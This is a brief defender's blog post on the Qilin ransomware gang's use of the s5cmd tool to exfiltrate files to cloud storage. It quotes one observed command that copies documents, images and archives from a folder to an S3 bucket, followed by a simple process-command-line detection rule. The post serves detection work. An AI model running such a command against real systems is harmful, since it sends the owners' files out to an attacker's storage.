232. Qilin Ransomware Gang Abuses S5cmd for Data Exfiltration
Hello everyone!
Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. And today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537).
Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration:
s5cmd --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]
For detection, we can use, for example, popular file types:
event_type: "processcreatewin"
AND
cmdline: ("include" AND "pdf" AND "xls" AND "doc")
See you tomorrow!
Comments
Post a Comment